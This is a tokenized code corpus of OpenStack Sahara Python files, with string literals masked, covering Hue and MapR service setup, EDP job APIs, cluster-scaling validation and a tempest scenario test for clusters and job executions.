dst_config_name , <EOL> s_config_name = src_config_name , <EOL> property_name = property_name ) ) <EOL> else : <EOL> LOG . 
warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) . <EOL> format ( dst_config_name = dst_config_name , <EOL> src_config_name = src_config_name , <EOL> property_name = property_name , <EOL> dst_config = dst_config [ <EOL> property_name ] , <EOL> src_config = src_config [ <EOL> property_name ] ) ) <EOL> else : <EOL> LOG . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( <EOL> d_config = dst_config_name , <EOL> s_config = src_config_name , <EOL> p_name = property_name ) ) <EOL> dst_config [ property_name ] = property_value <EOL> LOG . info ( _LI ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> . format ( source = src_config_name , <EOL> destination = dst_config_name ) ) <EOL> @ staticmethod <EOL> def _handle_pre_service_start ( instance , cluster_spec , hue_ini , <EOL> create_user ) : <EOL> with instance . remote ( ) as r : <EOL> r . execute_command ( '<STR_LIT>' , <EOL> run_as_root = True ) <EOL> LOG . info ( _LI ( '<STR_LIT>' ) ) <EOL> r . write_file_to ( '<STR_LIT>' , <EOL> hue_ini , <EOL> True ) <EOL> r . execute_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> run_as_root = True ) <EOL> r . execute_command ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , run_as_root = True ) <EOL> LOG . info ( _LI ( '<STR_LIT>' ) ) <EOL> r . execute_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> run_as_root = True ) <EOL> LOG . info ( _LI ( '<STR_LIT>' ) ) <EOL> if create_user : <EOL> r . execute_command ( '<STR_LIT>' <EOL> '<STR_LIT>' , run_as_root = True ) <EOL> LOG . info ( _LI ( '<STR_LIT>' ) ) <EOL> java_home = HueService . _get_java_home ( cluster_spec ) <EOL> if java_home : <EOL> r . replace_remote_string ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % java_home ) <EOL> r . execute_command ( '<STR_LIT>' , run_as_root = True ) <EOL> r . execute_command ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> run_as_root = True ) <EOL> LOG . 
info ( _LI ( '<STR_LIT>' ) ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> LOG . debug ( '<STR_LIT>' ) <EOL> self . _merge_configurations ( cluster_spec , '<STR_LIT>' , '<STR_LIT>' ) <EOL> LOG . debug ( '<STR_LIT>' ) <EOL> self . _merge_configurations ( cluster_spec , '<STR_LIT>' , '<STR_LIT>' ) <EOL> LOG . debug ( '<STR_LIT>' ) <EOL> self . _merge_configurations ( cluster_spec , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> LOG . debug ( '<STR_LIT>' ) <EOL> self . _merge_configurations ( cluster_spec , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> hosts = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if hosts is not None : <EOL> host = hosts . pop ( ) <EOL> if host is not None : <EOL> config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> if config is not None : <EOL> port = config . get ( '<STR_LIT>' , <EOL> self . default_web_ui_port ) <EOL> else : <EOL> port = self . default_web_ui_port <EOL> ip = host . management_ip <EOL> url_info [ self . name . title ( ) ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( ip , port ) <EOL> } <EOL> return url_info <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> services = cluster_spec . services <EOL> for reqd_service in self . required_services : <EOL> reqd_service_deployed = False <EOL> if services is not None : <EOL> for service in services : <EOL> reqd_service_deployed = ( service . deployed <EOL> and service . name == reqd_service ) <EOL> if reqd_service_deployed : <EOL> break <EOL> if not reqd_service_deployed : <EOL> raise ex . RequiredServiceMissingException ( reqd_service , <EOL> self . name ) <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> hue_ngs = cluster_spec . 
get_node_groups_containing_component ( '<STR_LIT>' ) <EOL> if hue_ngs is not None : <EOL> for hue_ng in hue_ngs : <EOL> components = hue_ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> LOG . info ( _LI ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> if cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> LOG . info ( _LI ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def pre_service_start ( self , cluster_spec , ambari_info , started_services ) : <EOL> hue_property_tree = HueService . _create_hue_property_tree ( cluster_spec ) <EOL> hue_ini = HueService . _create_hue_ini_file ( hue_property_tree ) <EOL> create_user = False <EOL> config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> if config is not None : <EOL> username = config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> password = config . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> create_user = username != '<STR_LIT>' and password != '<STR_LIT>' <EOL> hue_ngs = cluster_spec . get_node_groups_containing_component ( "<STR_LIT>" ) <EOL> if hue_ngs : <EOL> for ng in hue_ngs : <EOL> if ng . instances : <EOL> for instance in ng . instances : <EOL> with context . set_current_instance_id ( <EOL> instance . instance_id ) : <EOL> HueService . _handle_pre_service_start ( instance , <EOL> cluster_spec , <EOL> hue_ini , <EOL> create_user ) </s>
<s> import sahara . plugins . mapr . domain . node_process as np <EOL> import sahara . plugins . mapr . domain . service as s <EOL> import sahara . plugins . mapr . util . commands as cmd <EOL> import sahara . plugins . mapr . util . validation_utils as vu <EOL> ZK_CLIENT_PORT = <NUM_LIT> <EOL> ZOOKEEPER = np . NodeProcess ( <EOL> name = '<STR_LIT>' , <EOL> ui_name = '<STR_LIT>' , <EOL> package = '<STR_LIT>' , <EOL> open_ports = [ ZK_CLIENT_PORT ] <EOL> ) <EOL> WEB_SERVER = np . NodeProcess ( <EOL> name = '<STR_LIT>' , <EOL> ui_name = '<STR_LIT>' , <EOL> package = '<STR_LIT>' , <EOL> open_ports = [ <NUM_LIT> ] <EOL> ) <EOL> METRICS = np . NodeProcess ( <EOL> name = '<STR_LIT>' , <EOL> ui_name = '<STR_LIT>' , <EOL> package = '<STR_LIT>' , <EOL> open_ports = [ <NUM_LIT> ] <EOL> ) <EOL> class Management ( s . Service ) : <EOL> SSL_KEYSTORE = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> super ( Management , self ) . __init__ ( ) <EOL> self . _ui_name = '<STR_LIT>' <EOL> self . _node_processes = [ ZOOKEEPER , WEB_SERVER , METRICS ] <EOL> self . _ui_info = [ <EOL> ( '<STR_LIT>' , WEB_SERVER , '<STR_LIT>' ) , <EOL> ] <EOL> self . _validation_rules = [ <EOL> vu . at_least ( <NUM_LIT:1> , ZOOKEEPER ) , <EOL> vu . at_least ( <NUM_LIT:1> , WEB_SERVER ) , <EOL> vu . odd_count_of ( ZOOKEEPER ) , <EOL> ] <EOL> def post_install ( self , cluster_context , instances ) : <EOL> instance = cluster_context . get_instance ( WEB_SERVER ) <EOL> cmd . chown ( instance , '<STR_LIT>' , self . SSL_KEYSTORE ) </s>
<s> from sahara . plugins import utils as plugin_utils <EOL> from sahara . service . edp . spark import engine as shell_engine <EOL> class ShellEngine ( shell_engine . SparkShellJobEngine ) : <EOL> def __init__ ( self , cluster ) : <EOL> super ( ShellEngine , self ) . __init__ ( cluster ) <EOL> self . master = plugin_utils . get_instance ( cluster , "<STR_LIT>" ) <EOL> @ staticmethod <EOL> def job_type_supported ( job_type ) : <EOL> return ( job_type in shell_engine . SparkShellJobEngine . <EOL> get_supported_job_types ( ) ) </s>
<s> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> import six <EOL> from sahara import conductor as c <EOL> from sahara import context <EOL> from sahara import exceptions as ex <EOL> from sahara . i18n import _LE <EOL> from sahara . plugins import base as plugin_base <EOL> from sahara . service import api <EOL> from sahara . service . edp . binary_retrievers import dispatch <EOL> from sahara . service . edp import job_manager as manager <EOL> from sahara . utils import edp <EOL> from sahara . utils import proxy as p <EOL> conductor = c . API <EOL> LOG = logging . getLogger ( __name__ ) <EOL> CONF = cfg . CONF <EOL> def get_job_types ( ** kwargs ) : <EOL> hints = kwargs . get ( "<STR_LIT>" , [ "<STR_LIT:false>" ] ) [ <NUM_LIT:0> ] . lower ( ) == "<STR_LIT:true>" <EOL> plugin_names = kwargs . get ( "<STR_LIT>" , [ ] ) <EOL> all_plugins = plugin_base . PLUGINS . get_plugins ( ) <EOL> if plugin_names : <EOL> plugins = filter ( lambda x : x . name in plugin_names , all_plugins ) <EOL> else : <EOL> plugins = all_plugins <EOL> job_types = kwargs . get ( "<STR_LIT:type>" , edp . JOB_TYPES_ALL ) <EOL> versions = kwargs . get ( "<STR_LIT:version>" , [ ] ) <EOL> res = [ ] <EOL> for job_type in job_types : <EOL> job_entry = { "<STR_LIT:name>" : job_type , <EOL> "<STR_LIT>" : [ ] } <EOL> for plugin in plugins : <EOL> types_for_plugin = plugin . get_edp_job_types ( versions ) <EOL> p = plugin . dict <EOL> p [ "<STR_LIT>" ] = { } <EOL> for version , supported_types in six . iteritems ( types_for_plugin ) : <EOL> if job_type in supported_types : <EOL> if hints : <EOL> config_hints = plugin . get_edp_config_hints ( job_type , <EOL> version ) <EOL> else : <EOL> config_hints = { } <EOL> p [ "<STR_LIT>" ] [ version ] = config_hints <EOL> if p [ "<STR_LIT>" ] : <EOL> job_entry [ "<STR_LIT>" ] . append ( p ) <EOL> if job_entry [ "<STR_LIT>" ] : <EOL> res . 
append ( job_entry ) <EOL> return res <EOL> def get_job_config_hints ( job_type ) : <EOL> return manager . get_job_config_hints ( job_type ) <EOL> def execute_job ( job_id , data ) : <EOL> cluster_id = data [ '<STR_LIT>' ] <EOL> configs = data . get ( '<STR_LIT>' , { } ) <EOL> interface = data . get ( '<STR_LIT>' , { } ) <EOL> input_id = data . get ( '<STR_LIT>' , None ) <EOL> output_id = data . get ( '<STR_LIT>' , None ) <EOL> job_execution_info = data . get ( '<STR_LIT>' , { } ) <EOL> configs [ '<STR_LIT>' ] = job_execution_info <EOL> job_ex_dict = { '<STR_LIT>' : input_id , '<STR_LIT>' : output_id , <EOL> '<STR_LIT>' : job_id , '<STR_LIT>' : cluster_id , <EOL> '<STR_LIT:info>' : { '<STR_LIT:status>' : edp . JOB_STATUS_PENDING } , <EOL> '<STR_LIT>' : configs , '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : interface } <EOL> job_execution = conductor . job_execution_create ( context . ctx ( ) , job_ex_dict ) <EOL> context . set_current_job_execution_id ( job_execution . id ) <EOL> if p . job_execution_requires_proxy_user ( job_execution ) : <EOL> try : <EOL> p . create_proxy_user_for_job_execution ( job_execution ) <EOL> except ex . SaharaException as e : <EOL> LOG . error ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( reason = e ) ) <EOL> conductor . job_execution_destroy ( context . ctx ( ) , job_execution ) <EOL> raise e <EOL> api . OPS . run_edp_job ( job_execution . id ) <EOL> return job_execution <EOL> def get_job_execution_status ( id ) : <EOL> return manager . get_job_status ( id ) <EOL> def job_execution_list ( ** kwargs ) : <EOL> return conductor . job_execution_get_all ( context . ctx ( ) , <EOL> regex_search = True , ** kwargs ) <EOL> def get_job_execution ( id ) : <EOL> return conductor . job_execution_get ( context . ctx ( ) , id ) <EOL> def cancel_job_execution ( id ) : <EOL> context . set_current_job_execution_id ( id ) <EOL> job_execution = conductor . job_execution_get ( context . ctx ( ) , id ) <EOL> api . OPS . 
cancel_job_execution ( id ) <EOL> return job_execution <EOL> def update_job_execution ( id , values ) : <EOL> _update_status ( values . pop ( "<STR_LIT:info>" , None ) ) <EOL> return conductor . job_execution_update ( context . ctx ( ) , id , values ) <EOL> def _update_status ( info ) : <EOL> if info : <EOL> status = info . get ( "<STR_LIT:status>" , None ) <EOL> if status == edp . JOB_ACTION_SUSPEND : <EOL> api . OPS . job_execution_suspend ( id ) <EOL> def delete_job_execution ( id ) : <EOL> context . set_current_job_execution_id ( id ) <EOL> api . OPS . delete_job_execution ( id ) <EOL> def get_data_sources ( ** kwargs ) : <EOL> return conductor . data_source_get_all ( context . ctx ( ) , <EOL> regex_search = True , ** kwargs ) <EOL> def get_data_source ( id ) : <EOL> return conductor . data_source_get ( context . ctx ( ) , id ) <EOL> def delete_data_source ( id ) : <EOL> conductor . data_source_destroy ( context . ctx ( ) , id ) <EOL> def register_data_source ( values ) : <EOL> return conductor . data_source_create ( context . ctx ( ) , values ) <EOL> def data_source_update ( id , values ) : <EOL> return conductor . data_source_update ( context . ctx ( ) , id , values ) <EOL> def get_jobs ( ** kwargs ) : <EOL> return conductor . job_get_all ( context . ctx ( ) , regex_search = True , ** kwargs ) <EOL> def get_job ( id ) : <EOL> return conductor . job_get ( context . ctx ( ) , id ) <EOL> def create_job ( values ) : <EOL> return conductor . job_create ( context . ctx ( ) , values ) <EOL> def update_job ( id , values ) : <EOL> return conductor . job_update ( context . ctx ( ) , id , values ) <EOL> def delete_job ( job_id ) : <EOL> return conductor . job_destroy ( context . ctx ( ) , job_id ) <EOL> def create_job_binary ( values ) : <EOL> return conductor . job_binary_create ( context . ctx ( ) , values ) <EOL> def get_job_binaries ( ** kwargs ) : <EOL> return conductor . job_binary_get_all ( context . 
ctx ( ) , <EOL> regex_search = True , ** kwargs ) <EOL> def get_job_binary ( id ) : <EOL> return conductor . job_binary_get ( context . ctx ( ) , id ) <EOL> def update_job_binary ( id , values ) : <EOL> return conductor . job_binary_update ( context . ctx ( ) , id , values ) <EOL> def delete_job_binary ( id ) : <EOL> conductor . job_binary_destroy ( context . ctx ( ) , id ) <EOL> def create_job_binary_internal ( values ) : <EOL> return conductor . job_binary_internal_create ( context . ctx ( ) , values ) <EOL> def get_job_binary_internals ( ** kwargs ) : <EOL> return conductor . job_binary_internal_get_all ( context . ctx ( ) , <EOL> regex_search = True , ** kwargs ) <EOL> def get_job_binary_internal ( id ) : <EOL> return conductor . job_binary_internal_get ( context . ctx ( ) , id ) <EOL> def delete_job_binary_internal ( id ) : <EOL> conductor . job_binary_internal_destroy ( context . ctx ( ) , id ) <EOL> def get_job_binary_internal_data ( id ) : <EOL> return conductor . job_binary_internal_get_raw_data ( context . ctx ( ) , id ) <EOL> def update_job_binary_internal ( id , values ) : <EOL> return conductor . job_binary_internal_update ( context . ctx ( ) , id , values ) <EOL> def get_job_binary_data ( id ) : <EOL> job_binary = conductor . job_binary_get ( context . ctx ( ) , id ) <EOL> return dispatch . get_raw_binary ( job_binary , with_context = True ) </s>
<s> from sahara . service . edp . oozie . workflow_creator import base_workflow <EOL> class MapReduceWorkFlowCreator ( base_workflow . OozieWorkflowCreator ) : <EOL> def __init__ ( self ) : <EOL> super ( MapReduceWorkFlowCreator , self ) . __init__ ( '<STR_LIT>' ) <EOL> def build_workflow_xml ( self , prepare = None , <EOL> job_xml = None , configuration = None , <EOL> files = None , archives = None , <EOL> streaming = None ) : <EOL> prepare = prepare or { } <EOL> files = files or [ ] <EOL> archives = archives or [ ] <EOL> streaming = streaming or { } <EOL> for k in sorted ( prepare ) : <EOL> self . _add_to_prepare_element ( k , prepare [ k ] ) <EOL> for k in sorted ( streaming ) : <EOL> self . _add_to_streaming_element ( k , streaming [ k ] ) <EOL> self . _add_job_xml_element ( job_xml ) <EOL> self . _add_configuration_elements ( configuration ) <EOL> self . _add_files_and_archives ( files , archives ) </s>
from sahara import context
import sahara.exceptions as ex
from sahara.i18n import _
import sahara.plugins.base as plugin_base
from sahara.service import api as service_api
from sahara.service.api import v10 as api
from sahara.service.validations import acl
import sahara.service.validations.base as b
from sahara.utils import cluster as c_u


def check_cluster_scaling(data, cluster_id, **kwargs):
    """Validate a cluster-scaling request before it is executed.

    Checks run in order and the first failure raises: cluster existence,
    ACLs, engine compatibility, plugin capabilities, cluster status, and
    finally the requested node-group changes themselves.

    :param data: scaling request body; may contain a resize section
        and/or an add-node-groups section
    :param cluster_id: id of the cluster to scale
    :raises ex.NotFoundException: if no cluster with ``cluster_id`` exists
    :raises ex.InvalidReferenceException: if the engine, plugin or the
        cluster's current status does not allow scaling
    """
    ctx = context.current()
    cluster = api.get_cluster(id=cluster_id)
    if cluster is None:
        raise ex.NotFoundException(
            {'<STR_LIT:id>': cluster_id}, _('<STR_LIT>'))
    # Tenant and protected-resource checks must pass before anything else.
    acl.check_tenant_for_update(ctx, cluster)
    acl.check_protected_from_update(cluster, data)
    # Engine recorded at cluster-creation time (None when sahara_info is
    # absent, e.g. for clusters created by older versions).
    cluster_engine = cluster.sahara_info.get(
        '<STR_LIT>') if cluster.sahara_info else None
    engine_type_and_version = service_api.OPS.get_engine_type_and_version()
    # Clusters with no recorded engine are only accepted when the current
    # engine matches the expected prefix.
    if (not cluster_engine and
            not engine_type_and_version.startswith('<STR_LIT>')):
        raise ex.InvalidReferenceException(
            _("<STR_LIT>"
              "<STR_LIT>") %
            {"<STR_LIT>": engine_type_and_version})
    # A cluster created by a different engine type/version cannot be scaled.
    if (cluster.sahara_info and
            cluster_engine != engine_type_and_version):
        raise ex.InvalidReferenceException(
            _("<STR_LIT>"
              "<STR_LIT>") %
            {"<STR_LIT>": cluster.sahara_info.get('<STR_LIT>'),
             "<STR_LIT>": engine_type_and_version})
    # The plugin must implement both scaling-related optional operations.
    if not (plugin_base.PLUGINS.is_plugin_implements(cluster.plugin_name,
                                                     '<STR_LIT>') and (
            plugin_base.PLUGINS.is_plugin_implements(cluster.plugin_name,
                                                     '<STR_LIT>'))):
        raise ex.InvalidReferenceException(
            _("<STR_LIT>")
            % cluster.plugin_name)
    # Scaling is only permitted while the cluster is Active.
    if cluster.status != c_u.CLUSTER_STATUS_ACTIVE:
        raise ex.InvalidReferenceException(
            _("<STR_LIT>"
              "<STR_LIT>") % cluster.status)
    # Validate the resize section, when present.
    if data.get("<STR_LIT>"):
        b.check_resize(cluster, data['<STR_LIT>'])
    # Validate the add-node-groups section, when present.
    if data.get("<STR_LIT>"):
        b.check_add_node_groups(cluster, data['<STR_LIT>'])
        b.check_network_config(data['<STR_LIT>'],
                               cluster.has_proxy_gateway())
        b.check_cluster_hostnames_lengths(cluster.name,
                                          data['<STR_LIT>'])
<s> import time <EOL> from oslo_utils import timeutils <EOL> from saharaclient . api import base as sab <EOL> from tempest import config <EOL> from tempest import exceptions <EOL> from tempest . lib . common . utils import data_utils <EOL> from tempest . lib import decorators <EOL> from tempest import test <EOL> from sahara . tests . tempest . scenario . data_processing . client_tests import base <EOL> TEMPEST_CONF = config . CONF <EOL> class JobExecutionTest ( base . BaseDataProcessingTest ) : <EOL> def _check_register_image ( self , image_id ) : <EOL> self . client . images . update_image ( <EOL> image_id , TEMPEST_CONF . scenario . ssh_user , '<STR_LIT>' ) <EOL> reg_image = self . client . images . get ( image_id ) <EOL> self . assertDictContainsSubset ( <EOL> { '<STR_LIT>' : TEMPEST_CONF . scenario . ssh_user } , <EOL> reg_image . metadata ) <EOL> def _check_image_get ( self , image_id ) : <EOL> image = self . client . images . get ( image_id ) <EOL> self . assertEqual ( image_id , image . id ) <EOL> def _check_image_list ( self , image_id ) : <EOL> image_list = self . client . images . list ( ) <EOL> images_info = [ image . id for image in image_list ] <EOL> self . assertIn ( image_id , images_info ) <EOL> def _check_adding_tags ( self , image_id ) : <EOL> self . client . images . update_tags ( image_id , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> image = self . client . images . get ( image_id ) <EOL> self . assertDictContainsSubset ( { '<STR_LIT>' : '<STR_LIT:True>' , <EOL> '<STR_LIT>' : '<STR_LIT:True>' } , <EOL> image . metadata ) <EOL> def _check_deleting_tags ( self , image_id ) : <EOL> self . client . images . update_tags ( image_id , [ ] ) <EOL> image = self . client . images . get ( image_id ) <EOL> self . assertNotIn ( '<STR_LIT>' , image . metadata ) <EOL> self . assertNotIn ( '<STR_LIT>' , image . metadata ) <EOL> def _check_unregister_image ( self , image_id ) : <EOL> self . client . images . unregister_image ( image_id ) <EOL> image_list = self . 
client . images . list ( ) <EOL> self . assertNotIn ( image_id , [ image . id for image in image_list ] ) <EOL> def _check_cluster_create ( self ) : <EOL> worker = self . create_node_group_template ( <EOL> data_utils . rand_name ( '<STR_LIT>' ) , ** self . worker_template ) <EOL> master = self . create_node_group_template ( <EOL> data_utils . rand_name ( '<STR_LIT>' ) , ** self . master_template ) <EOL> cluster_templ = self . cluster_template . copy ( ) <EOL> cluster_templ [ '<STR_LIT>' ] = [ <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : master . id , <EOL> '<STR_LIT:count>' : <NUM_LIT:1> <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : worker . id , <EOL> '<STR_LIT:count>' : <NUM_LIT:3> <EOL> } <EOL> ] <EOL> if TEMPEST_CONF . service_available . neutron : <EOL> cluster_templ [ '<STR_LIT>' ] = self . get_private_network_id ( ) <EOL> cluster_template = self . create_cluster_template ( <EOL> data_utils . rand_name ( '<STR_LIT>' ) , ** cluster_templ ) <EOL> cluster_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> self . cluster_info = { <EOL> '<STR_LIT:name>' : cluster_name , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cluster_template . id , <EOL> '<STR_LIT>' : TEMPEST_CONF . data_processing . fake_image_id <EOL> } <EOL> cluster = self . create_cluster ( ** self . cluster_info ) <EOL> self . check_cluster_active ( cluster . id ) <EOL> self . assertEqual ( cluster_name , cluster . name ) <EOL> self . assertDictContainsSubset ( self . cluster_info , cluster . __dict__ ) <EOL> return cluster . id , cluster . name <EOL> def _check_cluster_list ( self , cluster_id , cluster_name ) : <EOL> cluster_list = self . client . clusters . list ( ) <EOL> clusters_info = [ ( clust . id , clust . name ) for clust in cluster_list ] <EOL> self . 
assertIn ( ( cluster_id , cluster_name ) , clusters_info ) <EOL> def _check_cluster_get ( self , cluster_id , cluster_name ) : <EOL> cluster = self . client . clusters . get ( cluster_id ) <EOL> self . assertEqual ( cluster_name , cluster . name ) <EOL> self . assertDictContainsSubset ( self . cluster_info , cluster . __dict__ ) <EOL> def _check_cluster_update ( self , cluster_id ) : <EOL> values = { <EOL> '<STR_LIT:name>' : data_utils . rand_name ( '<STR_LIT>' ) , <EOL> '<STR_LIT:description>' : '<STR_LIT:description>' <EOL> } <EOL> cluster = self . client . clusters . update ( cluster_id ) <EOL> self . assertDictContainsSubset ( values , cluster . __dict__ ) <EOL> def _check_cluster_scale ( self , cluster_id ) : <EOL> big_worker = self . create_node_group_template ( <EOL> data_utils . rand_name ( '<STR_LIT>' ) , ** self . worker_template ) <EOL> scale_body = { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:count>' : <NUM_LIT:2> , <EOL> '<STR_LIT:name>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> "<STR_LIT:count>" : <NUM_LIT:2> , <EOL> "<STR_LIT:name>" : '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:count>' : <NUM_LIT:1> , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : big_worker . id <EOL> } <EOL> ] <EOL> } <EOL> self . client . clusters . scale ( cluster_id , scale_body ) <EOL> self . check_cluster_active ( cluster_id ) <EOL> cluster = self . client . clusters . get ( cluster_id ) <EOL> for ng in cluster . node_groups : <EOL> if ng [ '<STR_LIT:name>' ] == scale_body [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] : <EOL> self . assertDictContainsSubset ( <EOL> scale_body [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , ng ) <EOL> elif ng [ '<STR_LIT:name>' ] == scale_body [ '<STR_LIT>' ] [ <NUM_LIT:1> ] [ '<STR_LIT:name>' ] : <EOL> self . assertDictContainsSubset ( <EOL> scale_body [ '<STR_LIT>' ] [ <NUM_LIT:1> ] , ng ) <EOL> elif ng [ '<STR_LIT:name>' ] == scale_body [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] : <EOL> self . 
assertDictContainsSubset ( <EOL> scale_body [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , ng ) <EOL> def _check_cluster_delete ( self , cluster_id ) : <EOL> self . client . clusters . delete ( cluster_id ) <EOL> cluster = self . client . clusters . get ( cluster_id ) <EOL> self . assertEqual ( '<STR_LIT>' , cluster . status ) <EOL> timeout = TEMPEST_CONF . data_processing . cluster_timeout <EOL> s_time = timeutils . utcnow ( ) <EOL> while timeutils . delta_seconds ( s_time , timeutils . utcnow ( ) ) < timeout : <EOL> try : <EOL> self . client . clusters . get ( cluster_id ) <EOL> except sab . APIException : <EOL> return <EOL> time . sleep ( TEMPEST_CONF . data_processing . request_timeout ) <EOL> raise exceptions . TimeoutException ( '<STR_LIT>' <EOL> '<STR_LIT>' % timeout ) <EOL> def _check_job_execution_create ( self , cluster_id ) : <EOL> container_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> self . create_container ( container_name ) <EOL> input_file_name = data_utils . rand_name ( '<STR_LIT:input>' ) <EOL> self . object_client . create_object ( container_name , input_file_name , <EOL> '<STR_LIT>' ) <EOL> input_file_url = '<STR_LIT>' % ( container_name , input_file_name ) <EOL> input_source_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> input_source = self . create_data_source ( <EOL> input_source_name , input_file_url , '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT:user>' : '<STR_LIT:test>' , '<STR_LIT:password>' : '<STR_LIT>' } ) <EOL> output_dir_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> output_dir_url = '<STR_LIT>' % ( container_name , output_dir_name ) <EOL> output_source_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> output_source = self . create_data_source ( <EOL> output_source_name , output_dir_url , '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT:user>' : '<STR_LIT:test>' , '<STR_LIT:password>' : '<STR_LIT>' } ) <EOL> job_binary = { <EOL> '<STR_LIT:name>' : data_utils . 
rand_name ( '<STR_LIT>' ) , <EOL> '<STR_LIT:url>' : input_file_url , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:user>' : '<STR_LIT:test>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> job_binary = self . create_job_binary ( ** job_binary ) <EOL> job_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> job = self . create_job ( job_name , '<STR_LIT>' , [ job_binary . id ] ) <EOL> self . job_exec_info = { <EOL> '<STR_LIT>' : job . id , <EOL> '<STR_LIT>' : cluster_id , <EOL> '<STR_LIT>' : input_source . id , <EOL> '<STR_LIT>' : output_source . id , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> job_execution = self . create_job_execution ( ** self . job_exec_info ) <EOL> return job_execution . id <EOL> def _check_job_execution_list ( self , job_exec_id ) : <EOL> job_exec_list = self . client . job_executions . list ( ) <EOL> self . assertIn ( job_exec_id , [ job_exec . id for job_exec in job_exec_list ] ) <EOL> def _check_job_execution_get ( self , job_exec_id ) : <EOL> job_exec = self . client . job_executions . get ( job_exec_id ) <EOL> job_exec_info = self . job_exec_info . copy ( ) <EOL> del job_exec_info [ '<STR_LIT>' ] <EOL> self . assertDictContainsSubset ( job_exec_info , job_exec . __dict__ ) <EOL> def _check_job_execution_update ( self , job_exec_id ) : <EOL> values = { <EOL> '<STR_LIT>' : True <EOL> } <EOL> job_exec = self . client . job_executions . update ( job_exec_id , ** values ) <EOL> self . assertDictContainsSubset ( values , job_exec . __dict__ ) <EOL> def _check_job_execution_delete ( self , job_exec_id ) : <EOL> self . client . job_executions . delete ( job_exec_id ) <EOL> job_exec_list = self . client . jobs . list ( ) <EOL> self . assertNotIn ( job_exec_id , [ job_exec . id for <EOL> job_exec in job_exec_list ] ) <EOL> @ decorators . skip_because ( bug = "<STR_LIT>" ) <EOL> @ test . attr ( type = '<STR_LIT>' ) <EOL> @ test . 
services ( '<STR_LIT>' ) <EOL> def test_job_executions ( self ) : <EOL> image_id = TEMPEST_CONF . data_processing . fake_image_id <EOL> self . _check_register_image ( image_id ) <EOL> self . _check_image_get ( image_id ) <EOL> self . _check_image_list ( image_id ) <EOL> self . _check_adding_tags ( image_id ) <EOL> cluster_id , cluster_name = self . _check_cluster_create ( ) <EOL> self . _check_cluster_list ( cluster_id , cluster_name ) <EOL> self . _check_cluster_get ( cluster_id , cluster_name ) <EOL> self . _check_cluster_update ( cluster_id ) <EOL> self . _check_cluster_scale ( cluster_id ) <EOL> job_exec_id = self . _check_job_execution_create ( cluster_id ) <EOL> self . _check_job_execution_list ( job_exec_id ) <EOL> self . _check_job_execution_get ( job_exec_id ) <EOL> self . _check_job_execution_update ( job_exec_id ) <EOL> self . _check_job_execution_delete ( job_exec_id ) <EOL> self . _check_cluster_delete ( cluster_id ) <EOL> self . _check_deleting_tags ( image_id ) <EOL> self . _check_unregister_image ( 